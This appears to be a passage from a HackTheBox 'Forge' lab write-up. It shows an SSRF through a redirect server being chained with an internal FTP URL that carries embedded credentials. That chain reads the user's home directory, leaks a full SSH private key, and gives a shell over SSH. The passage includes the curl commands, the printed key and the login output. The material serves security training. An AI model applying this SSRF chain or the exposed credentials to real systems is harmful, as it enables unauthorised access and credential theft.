Internal FTP

the redirect.py web server will now redirect requests to http://admin.forge.htb/upload?u=ftp://user:heightofsecurity123!@localhost:21 This is possible because the admin.forge.htb/announcements specified that the file upload now additionally features ftp and sftp

notice the ftp connection string is supplied with credential(user:heightofsecurity123!) and pointing to localhost:21

it’s uploaded to http://forge.htb/uploads/zpyh0ipEENsYBY0NQqXl

┌──(kali㉿kali)-[~/archive/htb/labs/forge]
└─$ curl -s http://forge.htb/uploads/zpyh0ipEENsYBY0NQqXl            
drwxr-xr-x    3 1000     1000         4096 Aug 04  2021 snap
-rw-r-----    1 0        1000           33 apr 12 16:32 user.txt

Checking the uploaded “file”, reveals something that looks much like a home directory of the logged in user given the fact that there is the user.txt file as well as the snap directory

This was NOT an expected result because the u parameter is not pointing to any particular resource but the FTP server itself I genuinely believed that it would show an error as uploading a directory doesn’t make sense, but instead, I get an output of dir or ls command of the FTP server

SSH Key

I fixed the redirect.py web server again to check for the SSH directory inside

It’s saved to http://forge.htb/uploads/rv1ejzFafTO7ngViz38k

┌──(kali㉿kali)-[~/archive/htb/labs/forge]
└─$ curl -s http://forge.htb/uploads/rv1ejzFafTO7ngViz38k
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>

It’s errored out with the code 500. I was really stuck at this point and I couldn’t figure out why the web app would return the code 500

Then I decided to fetch the SSH private key directly to see what happens

I sent it in again and its saved to http://forge.htb/uploads/9oFOAcFJdSmE16ZyWGw8

┌──(kali㉿kali)-[~/archive/htb/labs/forge]
└─$ curl -s http://forge.htb/uploads/9oFOAcFJdSmE16ZyWGw8
-----BEGIN OPENSSH PRIVATE KEY-----
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
shlLupso7WoS0AAAAKdXNlckBmb3JnZQE=
-----END OPENSSH PRIVATE KEY-----

To my surprise, there was indeed the SSH private key inside the SSH directory

┌──(kali㉿kali)-[~/archive/htb/labs/forge]
└─$ curl -s http://forge.htb/uploads/9oFOAcFJdSmE16ZyWGw8 -o id_rsa ; chmod 600 id_rsa

So I saved it as id_rsa and set its permission bits to 600 so that it can be recognized as a valid SSH private key

SSH

┌──(kali㉿kali)-[~/archive/htb/labs/forge]
└─$ ssh user@forge.htb -i id_rsa 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-81-generic x86_64)
 
 * documentation:  https://help.ubuntu.com
 * management:     https://landscape.canonical.com
 * support:        https://ubuntu.com/advantage
 
  system information as of wed 12 apr 2023 09:20:00 PM UTC
 
  system load:           0.0
  usage of /:            46.0% of 6.82GB
  memory usage:          26%
  swap usage:            0%
  processes:             223
  users logged in:       0
  ipv4 address for eth0: 10.10.11.111
  ipv6 address for eth0: dead:beef::250:56ff:feb9:7080
 
 
0 updates can be applied immediately.
 
 
The list of available updates is more than a week old.
to check for new updates run: sudo apt update
 
last login: Fri Aug 20 01:32:18 2021 from 10.10.14.6
user@forge:~$ whoami
user
user@forge:~$ hostname
forge
user@forge:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.111  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 fe80::250:56ff:feb9:7080  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:7080  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:70:80  txqueuelen 1000  (Ethernet)
        RX packets 1880940  bytes 284601896 (284.6 MB)
        RX errors 0  dropped 55  overruns 0  frame 0
        TX packets 1921761  bytes 578610290 (578.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 22265  bytes 1777190 (1.7 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 22265  bytes 1777190 (1.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Here I wasn’t sure what user this SSH private key belongs to, but then I realized that the user user was used for the FTP server I just gave it a shot and I was in

Initial Foothold established to the target system as the user user via chaining SSRF-SSH

InfoSec LAB

Explorer

Forge_FTP_internal

Internal FTP

SSH Key

SSH

Interactive Graph View

Table of Contents

Backlinks